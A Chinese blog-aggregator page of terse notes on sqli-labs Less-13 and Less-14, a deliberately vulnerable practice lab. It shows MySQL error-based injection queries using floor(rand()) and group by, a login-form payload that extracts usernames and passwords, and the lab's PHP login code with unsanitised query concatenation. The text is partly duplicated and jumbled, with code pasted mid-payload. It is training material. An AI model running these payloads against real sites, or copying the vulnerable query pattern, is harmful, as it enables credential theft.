Less-13&14
来源:互联网 发布:星际争霸mac版 编辑:程序博客网 时间:2024/06/09 21:50
use near '''') and password=('') LIMIT 0,1' at line 1
select * from table where username = ('inputuser') and password = ('inputpassword')
基础知识
user() 用户名;current_user()当前用户名
session_user() 连接数据库的用户名 @@hostname 主机名
database() 数据库名 @@port 数据库端口名
version() MySQL数据库版本 version_complile_os 操作系统
@@datatir数据库路径 basedir MySQL安装路径
floor()向下取整
rand()0-1之间随机的一个数
select count(*),(concat("~",current_user,"~",floor(rand()*2)))name from information_schema.tables group by name;
select count(*),concat("~",database(),"~",floor(rand()*2))name from information_schema.tables group by name;
select count(*),concat("~",(select table_name from information_schema.tables where table_schema=database()limit 0,1),"~",floor(rand()*2))name from information_schema.tables group by name
select count(*),concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2))name from information_schema.tables group by name
select 1 from ()name
uname=123') and (select 1 from (select count(*),(concat("~",concat((select username from users limit 1,1),";;",(select password from users limit 1,1)),"~",floor(rand()*2)))name from information_schema.tables group b
y name)b)#&passwd=123&submit=Submit
Less 14
use near '""" and password="" LIMIT 0,1' at line 1
....
select * from table where username = ('inputuser') and password = ('inputpassword')
基础知识
user() 用户名;current_user()当前用户名
session_user() 连接数据库的用户名 @@hostname 主机名
database() 数据库名 @@port 数据库端口名
version() MySQL数据库版本 version_complile_os 操作系统
@@datatir数据库路径 basedir MySQL安装路径
floor()向下取整
rand()0-1之间随机的一个数
select count(*),(concat("~",current_user,"~",floor(rand()*2)))name from information_schema.tables group by name;
select count(*),concat("~",database(),"~",floor(rand()*2))name from information_schema.tables group by name;
select count(*),concat("~",(select table_name from information_schema.tables where table_schema=database()limit 0,1),"~",floor(rand()*2))name from information_schema.tables group by name
select count(*),concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2))name from information_schema.tables group by name
select 1 from ()name
uname=123') and (select 1 from (select count(*),(concat("~",concat((select username from users limit 1,1),";;",(select password from users limit 1,1)),"~",floor(rand()*2)))name from information_schema.tables group b
if(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];//echo "<br>";//echo 'Your Password:' .$row['password'];//echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?>
y name)b)#&passwd=123&submit=Submit
Less 14
use near '""" and password="" LIMIT 0,1' at line 1
....
0 0
- Less-13&14
- Linux命令(14):less
- 13、less的使用
- less
- less
- LESS
- less
- less
- less
- less
- less
- LESS
- less
- less
- less
- Less
- LESS
- Less
- Java之万年历
- 在windows下 zookeeper 入门安装和测试
- CSU-1783: 聊天止于呵呵(字符串处理)
- DBA必知的mysql备份与还原
- epoll为什么比select和poll效率更高
- Less-13&14
- shiro与spring整合之DelegatingFilterProxy源码解析
- LintCode 45 最大子数组差
- 链表中倒数第K个节点
- solr 报错:. Index fetch failed. Exception: Server refused connection
- JavaScrip数组去重
- Java中通过FTP上传和下载
- MySQL视图2
- 寻找最小生成树的欧拉路径,即一笔画问题